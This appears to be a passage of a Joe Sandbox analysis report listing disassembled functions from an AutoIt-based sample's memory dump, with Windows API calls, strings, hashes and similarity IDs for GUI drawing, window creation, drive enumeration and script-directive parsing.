Opcode ID: 50a3a57023c7bdb4237d1ee588642f8877d6c277a5d7c21fa4e23f691906729b
Instruction ID: c7bf9f67126fb4b2f919207964f1423d90be9cf191a5fcb497ce69ceecfddc14
Opcode Fuzzy Hash: 50a3a57023c7bdb4237d1ee588642f8877d6c277a5d7c21fa4e23f691906729b
Instruction Fuzzy Hash: 52D18EB1208311DBCB04EF10D551F6E7BE5AF95350F044468F9826B3A3DB29EE4AEB41

Function 00F2A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00F2A630
GetSysColorBrush.USER32(0000000F), ref: 00F2A661
GetSysColor.USER32(0000000F), ref: 00F2A66D
SetBkColor.GDI32(?,000000FF), ref: 00F2A687
SelectObject.GDI32(?,00000000), ref: 00F2A696
InflateRect.USER32(?,000000FF,000000FF), ref: 00F2A6C1
GetSysColor.USER32(00000010), ref: 00F2A6C9
CreateSolidBrush.GDI32(00000000), ref: 00F2A6D0
FrameRect.USER32(?,?,00000000), ref: 00F2A6DF
DeleteObject.GDI32(00000000), ref: 00F2A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 00F2A731
FillRect.USER32(?,?,00000000), ref: 00F2A763
GetWindowLongW.USER32(?,000000F0), ref: 00F2A78E

Part of subcall function 00F2A8CA: GetSysColor.USER32(00000012), ref: 00F2A903
Part of subcall function 00F2A8CA: SetTextColor.GDI32(?,?), ref: 00F2A907
Part of subcall function 00F2A8CA: GetSysColorBrush.USER32(0000000F), ref: 00F2A91D
Part of subcall function 00F2A8CA: GetSysColor.USER32(0000000F), ref: 00F2A928
Part of subcall function 00F2A8CA: GetSysColor.USER32(00000011), ref: 00F2A945
Part of subcall function 00F2A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F2A953
Part of subcall function 00F2A8CA: SelectObject.GDI32(?,00000000), ref: 00F2A964
Part of subcall function 00F2A8CA: SetBkColor.GDI32(?,00000000), ref: 00F2A96D
Part of subcall function 00F2A8CA: SelectObject.GDI32(?,?), ref: 00F2A97A
Part of subcall function 00F2A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00F2A999
Part of subcall function 00F2A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F2A9B0
Part of subcall function 00F2A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00F2A9C5
Part of subcall function 00F2A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F2A9ED

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 41a8bf46ceb93f8684bbabe9bfbe00d260cd98d6dff5c9532938e86514a6487b
Instruction ID: fb8239bc35a78680d1c6f2df78ed4d1091048c897e4a01aafafb64ee6db926e8
Opcode Fuzzy Hash: 41a8bf46ceb93f8684bbabe9bfbe00d260cd98d6dff5c9532938e86514a6487b
Instruction Fuzzy Hash: 97917B72418315AFC7209F64EC08E5B7BB9FF88331F140A29F962961A0D735D94AEB52

Function 00EA2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00EA2CA2
DeleteObject.GDI32(00000000), ref: 00EA2CE8
DeleteObject.GDI32(00000000), ref: 00EA2CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00EA2CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00EA2D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00EDC43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00EDC474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00EDC89D

Part of subcall function 00EA1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EA2036,?,00000000,?,?,?,?,00EA16CB,00000000,?), ref: 00EA1B9A

SendMessageW.USER32(?,00001053), ref: 00EDC8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00EDC8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00EDC907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00EDC912

Strings

0, xrefs: 00EDC731

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 0fcb12330e7afe566ed2862e17004870335c3c5c510f7d665661b99f363e9498
Instruction ID: 65f39ca8caec87ea51e2ee77d4c1ff8eef3af3a4ca45e2652c77135d703671bf
Opcode Fuzzy Hash: 0fcb12330e7afe566ed2862e17004870335c3c5c510f7d665661b99f363e9498
Instruction Fuzzy Hash: 7D12AE30604202AFDB25CF28C884BA9BBE1FF09354F64657AF555EB262C731E846DB91

Function 00F174AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00F174DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F1759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00F175DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00F175ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00F17633
GetClientRect.USER32(00000000,?), ref: 00F1763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00F17683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F17692
GetStockObject.GDI32(00000011), ref: 00F176A2
SelectObject.GDI32(00000000,00000000), ref: 00F176A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00F176B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F176BF
DeleteDC.GDI32(00000000), ref: 00F176C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F176F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 00F1770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00F17746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F1775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 00F1776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00F1779B
GetStockObject.GDI32(00000011), ref: 00F177A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F177B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00F177BB

Strings

msctls_progress32, xrefs: 00F1773C
DISPLAY, xrefs: 00F17688
static, xrefs: 00F1767D, 00F17795
AutoIt v3, xrefs: 00F1762B

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 36aa0be6b9c5a8d8ff9b71ec49b74377f063870fb18e18aeb87c4a09c6c3b566
Instruction ID: 2e01ba647a62be3da2846da5897a46bad3c562813f1c3ba63538c162350929b6
Opcode Fuzzy Hash: 36aa0be6b9c5a8d8ff9b71ec49b74377f063870fb18e18aeb87c4a09c6c3b566
Instruction Fuzzy Hash: 60A16271A10619BFEB14DBA4DC4AFAF7BB9EB09710F004114FA15AB2E1C670AD05DB64

Function 00F0AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F0AD1E
GetDriveTypeW.KERNEL32(?,00F2FAC0,?,\\.\,00F2F910), ref: 00F0ADFB
SetErrorMode.KERNEL32(00000000,00F2FAC0,?,\\.\,00F2F910), ref: 00F0AF59

Strings

Unknown, xrefs: 00F0AE1B, 00F0AEBF
RAMDisk, xrefs: 00F0AE25
iSCSI, xrefs: 00F0AEFE
FileBackedVirtual, xrefs: 00F0AF28
Fibre, xrefs: 00F0AEE9
Fixed, xrefs: 00F0AE43
Removable, xrefs: 00F0AE4D
Virtual, xrefs: 00F0AF21
USB, xrefs: 00F0AEF0
PhysicalDrive, xrefs: 00F0ADA7
SSD, xrefs: 00F0AE86
\\.\, xrefs: 00F0AD70
SSA, xrefs: 00F0AEE2
RAID, xrefs: 00F0AEF7
ATA, xrefs: 00F0AED4
1394, xrefs: 00F0AEDB
MMC, xrefs: 00F0AF1A
CDROM, xrefs: 00F0AE2F
SATA, xrefs: 00F0AF0C
ATAPI, xrefs: 00F0AECD
SCSI, xrefs: 00F0AEC6
Network, xrefs: 00F0AE39
SAS, xrefs: 00F0AF05

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 8cda6861beb8979f18e7f3f21fb8509074659faa6ac1c9cd7b7e039b6afeb9a6
Instruction ID: 737512911a9c74e8797d8a8a7ea36242f5e91f80a8a92a375518712a1f728e89
Opcode Fuzzy Hash: 8cda6861beb8979f18e7f3f21fb8509074659faa6ac1c9cd7b7e039b6afeb9a6
Instruction Fuzzy Hash: 9851A4B1A44306EBCB10EB20CD42DBD73A5EB49752B204066E907BB2D1DA74ED46FB53

Function 00EA68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00EA6931
__wcsnicmp.LIBCMT ref: 00EA6949
__wcsnicmp.LIBCMT ref: 00EA6961
__wcsnicmp.LIBCMT ref: 00EA6979
__wcsnicmp.LIBCMT ref: 00EA6991
__wcsnicmp.LIBCMT ref: 00EA69A9
__wcsnicmp.LIBCMT ref: 00EA69C1
__wcsnicmp.LIBCMT ref: 00EA69D5
__wcsnicmp.LIBCMT ref: 00EA6A16
__wcsnicmp.LIBCMT ref: 00EA6A2A
__wcsnicmp.LIBCMT ref: 00EA6A3E
__wcsnicmp.LIBCMT ref: 00EA6A52

Strings

#cs, xrefs: 00EA69CF, 00EA6A24
Bad directive syntax error, xrefs: 00EDE31A
#OnAutoItStartRegister, xrefs: 00EA6973
#include, xrefs: 00EA69A3
#pragma compile, xrefs: 00EA692B
#notrayicon, xrefs: 00EA6943
#include-once, xrefs: 00EA698B
Cannot parse #include, xrefs: 00EDE3F0
#requireadmin, xrefs: 00EA695B
#comments-end, xrefs: 00EA6A38
Unterminated group of comments, xrefs: 00EDE403
#ce, xrefs: 00EA6A4C
#comments-start, xrefs: 00EA69BB, 00EA6A10

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: cac1abcffd8801e5a282ec4375e8e8b2212e10c62e75cb3e6115630e2b2bcb1e
Instruction ID: 9a493a28e98c9aff10224fcea2927f39f4a1f67949c84c5fd181072df9904502
Opcode Fuzzy Hash: cac1abcffd8801e5a282ec4375e8e8b2212e10c62e75cb3e6115630e2b2bcb1e
Instruction Fuzzy Hash: 5A810A71740205AACF11BA60ED47FBF37A8EF1B704F086026F905BE292EB61ED46D251

Function 00F29A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00F29AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00F29B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 00F29BA7

Strings

0, xrefs: 00F29BE4

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 0701b668ba5ab9c14405384dc0bae8a9ed1f91a60c708832ebeebfb99af09355
Instruction ID: 0ad1ab89bc8314416b1d5b9e8ea479de230a5f326edc6fba6b42c2ada89e359d
Opcode Fuzzy Hash: 0701b668ba5ab9c14405384dc0bae8a9ed1f91a60c708832ebeebfb99af09355
Instruction Fuzzy Hash: D9021231508321AFD725CF24E949BAABBE4FF49320F04452CF999D72A1C7B4D849EB52

Function 00F2A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00F2A903
SetTextColor.GDI32(?,?), ref: 00F2A907
GetSysColorBrush.USER32(0000000F), ref: 00F2A91D
GetSysColor.USER32(0000000F), ref: 00F2A928
CreateSolidBrush.GDI32(?), ref: 00F2A92D
GetSysColor.USER32(00000011), ref: 00F2A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F2A953
SelectObject.GDI32(?,00000000), ref: 00F2A964
SetBkColor.GDI32(?,00000000), ref: 00F2A96D
SelectObject.GDI32(?,?), ref: 00F2A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 00F2A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F2A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00F2A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F2A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F2AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 00F2AA32
DrawFocusRect.USER32(?,?), ref: 00F2AA3D
GetSysColor.USER32(00000011), ref: 00F2AA4B
SetTextColor.GDI32(?,00000000), ref: 00F2AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F2AA67
SelectObject.GDI32(?,00F2A5FA), ref: 00F2AA7E
DeleteObject.GDI32(?), ref: 00F2AA89
SelectObject.GDI32(?,?), ref: 00F2AA8F
DeleteObject.GDI32(?), ref: 00F2AA94
SetTextColor.GDI32(?,?), ref: 00F2AA9A
SetBkColor.GDI32(?,?), ref: 00F2AAA4

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: d59cf3c91b915fbd3e47dd504ef4190a1d7cc67a1af841b55056a2d78ffaa900
Instruction ID: fac3291d5c3041feff68923575f27e682aba405ede05fcc6cb05ad7a453785db
Opcode Fuzzy Hash: d59cf3c91b915fbd3e47dd504ef4190a1d7cc67a1af841b55056a2d78ffaa900
Instruction Fuzzy Hash: B7515B71910218FFDB209FA4DC49EAEBBB9EF08320F114225F911AB2A1D7759945EF90

Function 00F289D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F28AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F28AD2
CharNextW.USER32(0000014E), ref: 00F28B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F28B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F28B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F28B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F28B86
SetWindowTextW.USER32(?,0000014E), ref: 00F28BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F28BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00F28C1F
_memset.LIBCMT ref: 00F28C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F28C8D
_memset.LIBCMT ref: 00F28CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F28D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00F28D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00F28E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00F28E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F28E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F28EB4
DrawMenuBar.USER32(?), ref: 00F28EC3
SetWindowTextW.USER32(?,0000014E), ref: 00F28EEB

Strings

0, xrefs: 00F28E55

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: cc0b8517e3d7e32dedbcca631eee9193f3a858d341a1d80b902a3b12401a0c78
Instruction ID: 6dce39ad7ef830ebd3ac63d47898dab75e68c9e37e867c958473c10219a90e2f
Opcode Fuzzy Hash: cc0b8517e3d7e32dedbcca631eee9193f3a858d341a1d80b902a3b12401a0c78
Instruction Fuzzy Hash: EEE18271901228AFDF209F60DC84EEE7BB9EF05760F10815AF915AA190DF749986EF60

Function 00F2488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00F249CA
GetDesktopWindow.USER32 ref: 00F249DF
GetWindowRect.USER32(00000000), ref: 00F249E6
GetWindowLongW.USER32(?,000000F0), ref: 00F24A48
DestroyWindow.USER32(?), ref: 00F24A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F24A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F24ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F24AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00F24AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F24B09
IsWindowVisible.USER32(?), ref: 00F24B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F24B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F24B58
GetWindowRect.USER32(?,?), ref: 00F24B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00F24B96
GetMonitorInfoW.USER32(00000000,?), ref: 00F24BB0
CopyRect.USER32(?,?), ref: 00F24BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00F24C32

Strings

(, xrefs: 00F24BA3
tooltips_class32, xrefs: 00F24A96
0, xrefs: 00F24975

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: b8cd666108efcef5f45c9d5b2bd10249abb54993110c2b84aa482aa4b6b41b4d
Instruction ID: 460ce5d201f3080dd734e6e186b8f654540ef378dc045b4e5f86643613e214c1
Opcode Fuzzy Hash: b8cd666108efcef5f45c9d5b2bd10249abb54993110c2b84aa482aa4b6b41b4d
Instruction Fuzzy Hash: B5B19C71604350AFDB04DF64D848B6ABBE4FF89710F00892CF599AB2A1D7B4EC05DB95

Function 00F0449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00F044AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00F044D2
_wcscpy.LIBCMT ref: 00F04500
_wcscmp.LIBCMT ref: 00F0450B
_wcscat.LIBCMT ref: 00F04521
_wcsstr.LIBCMT ref: 00F0452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00F04548
_wcscat.LIBCMT ref: 00F04591
_wcscat.LIBCMT ref: 00F04598
_wcsncpy.LIBCMT ref: 00F045C3

Strings

04090000, xrefs: 00F0457E
DefaultLangCodepage, xrefs: 00F045AB
%u.%u.%u.%u, xrefs: 00F04626
StringFileInfo\, xrefs: 00F0451B
\VarFileInfo\Translation, xrefs: 00F04540

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 3352c50a5e4e03809616eaf081e7a5260a56e087cde29e5166f2abb0850aeb55
Instruction ID: 8a111ad4d1e4e4d1fe4a33d397015d7cf200485a9fd122e2de60c25613d28160
Opcode Fuzzy Hash: 3352c50a5e4e03809616eaf081e7a5260a56e087cde29e5166f2abb0850aeb55
Instruction Fuzzy Hash: 0C41D7729402047BDB10AA749D47FBF77BCDF41710F04006DFA05F61C2EA36EA02A6A6

Function 00EA27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EA28BC
GetSystemMetrics.USER32(00000007), ref: 00EA28C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EA28EF
GetSystemMetrics.USER32(00000008), ref: 00EA28F7
GetSystemMetrics.USER32(00000004), ref: 00EA291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00EA2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00EA2949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00EA297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00EA2990
GetClientRect.USER32(00000000,000000FF), ref: 00EA29AE
GetStockObject.GDI32(00000011), ref: 00EA29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00EA29D5

Part of subcall function 00EA2344: GetCursorPos.USER32(?), ref: 00EA2357
Part of subcall function 00EA2344: ScreenToClient.USER32(00F657B0,?), ref: 00EA2374
Part of subcall function 00EA2344: GetAsyncKeyState.USER32(00000001), ref: 00EA2399
Part of subcall function 00EA2344: GetAsyncKeyState.USER32(00000002), ref: 00EA23A7

SetTimer.USER32(00000000,00000000,00000028,00EA1256), ref: 00EA29FC

Strings

AutoIt v3 GUI, xrefs: 00EA2974

Memory Dump Source

